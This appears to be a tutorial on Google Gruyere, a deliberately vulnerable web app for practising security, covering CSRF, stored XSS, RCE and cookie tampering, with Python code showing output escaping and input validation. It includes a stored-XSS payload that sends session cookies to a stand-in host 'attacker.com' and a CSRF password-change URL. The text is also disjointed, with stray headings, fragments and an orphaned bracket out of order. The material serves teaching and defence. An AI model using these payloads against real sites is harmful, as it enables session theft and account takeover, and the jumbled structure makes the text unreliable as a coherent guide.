Gruyere: Learn Web Application Exploits and Defenses
Gruyere does not check anti-CSRF tokens on state-changing operations (such as changing a password or deleting a snippet). An attacker can embed an invisible image in a malicious site that points to http://gruyere/set_password?new=evil ; when a user who is logged in to Gruyere visits that site, the browser sends the request along with their session cookie. The Impact: forcing a logged-in user to perform unwanted actions. The Defense: Synchronizer Token Pattern. Generate a unique, unpredictable token for each user session and validate it on every POST/PUT/DELETE request. Gruyere's solution page shows you exactly how to add this.
Why Gruyere is Essential for Developers and Security Professionals
Users should only have the access necessary for their specific role.

Summary: Building a "Hole-Free" App
Master Web App Hacking with Google Gruyere: Top Exploits and Defenses
Gruyere's "Profile settings" page, the age field.

Step 1: Exploit. Input: 35<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script> The app saves this to the datastore unmodified.

Step 2: Consequence. Every time an admin views your profile, the script runs in the admin's browser and their admin session cookie is sent to the attacker's server. The attacker then loads the page with that cookie and acts as the admin.

Step 3: The Fix (Code Level). Replace:
self.response.write("<div>Age: %s</div>" % user.age)
With:
self.response.write("<div>Age: %s</div>" % cgi.escape(user.age))
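The fix above, worked through in an added Python example that is not Gruyere's own code: the age value is rendered unescaped and then escaped with html.escape, the Python 3 replacement for cgi.escape (removed in 3.8), and a whitelist check is applied before the value is stored. Function names are assumed, and the payload string is the one quoted above, embedded as a constructed test input.

```python
import html
from typing import Optional

# The payload quoted in the walkthrough above, embedded here as a constructed
# test input (attacker.com is the hypothetical host from the text; no request
# is ever made).
AGE_PAYLOAD = (
    "35<script>fetch('https://attacker.com/steal?cookie='"
    "+document.cookie)</script>"
)


def render_age_vulnerable(age: str) -> str:
    """Gruyere-style rendering: the stored value is pasted into the page
    verbatim, so any markup in it becomes part of the DOM."""
    return "<div>Age: %s</div>" % age


def render_age_fixed(age: str) -> str:
    """Hardened rendering: escape at output time. html.escape replaces
    cgi.escape and, unlike cgi.escape's default, also escapes quotes, which
    matters if the value ever lands inside an attribute rather than text."""
    return "<div>Age: %s</div>" % html.escape(age, quote=True)


def validate_age(raw: str) -> Optional[int]:
    """Whitelist validation before storage: an age is a run of ASCII digits
    in a plausible range, nothing else. Returns None on rejection. This is
    defence in depth alongside output escaping, not a replacement for it."""
    if raw.isascii() and raw.isdigit() and 0 <= int(raw) <= 150:
        return int(raw)
    return None


def contains_script_tag(rendered: str) -> bool:
    """Did a live <script> element survive rendering?"""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    print("vulnerable:", render_age_vulnerable(AGE_PAYLOAD))
    print("fixed:     ", render_age_fixed(AGE_PAYLOAD))
    print("stored as: ", validate_age(AGE_PAYLOAD), validate_age("35"))
```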
Remote Code Execution (RCE): the holy grail for an attacker. It allows them to execute arbitrary operating system commands on the server, effectively gaining complete control over the application and the underlying machine.
Google developed Gruyere as a "cheesy" and intentionally vulnerable web application designed for students and security researchers to practice in a safe environment. It allows users to play the role of a malicious hacker to find security bugs and then learn how to fix them.

Key Vulnerabilities Covered
To fix the Gruyere profile feature, a developer would look at:
In the "Privilege Separation" section, Gruyere demonstrates how to set the HttpOnly and Secure flags on cookies.
) to clean HTML and user-supplied data before it is rendered or processed.

Whitelist Filtering
Every challenge includes an "Exploit and Fix" section that provides a brief overview of the vulnerability and the specific code required to patch it.

For a structured academic overview, you might also find the Google Gruyere Security Assessment Report
Object handling. Exploit: the attacker crafts a malicious serialized object that executes arbitrary code upon deserialization (e.g., Java, PHP, Python pickle).
Separate the query structure from the data. Ensure the interpreter treats user input strictly as data, never as executable code.
The attacker injects a script into data stored permanently on the server (e.g., database, comment section). Every user who views the infected page executes the payload.
It provides a safe sandbox to practice, which is more effective than theoretical knowledge.
Web applications use cookies to remember who you are. Since these cookies are stored on the client side (your browser), they are vulnerable to manipulation. A careful application adds a hash to the cookie so that tampering can be detected, but a poor implementation of that check can be bypassed.
Learning web application security is a cycle of offense and defense. Gruyere is valuable because it compresses a decade of security mistakes into a 5-page web app. By spending a weekend with Gruyere, you will move from being a developer who hopes the code is secure to an engineer who knows how to test and break it.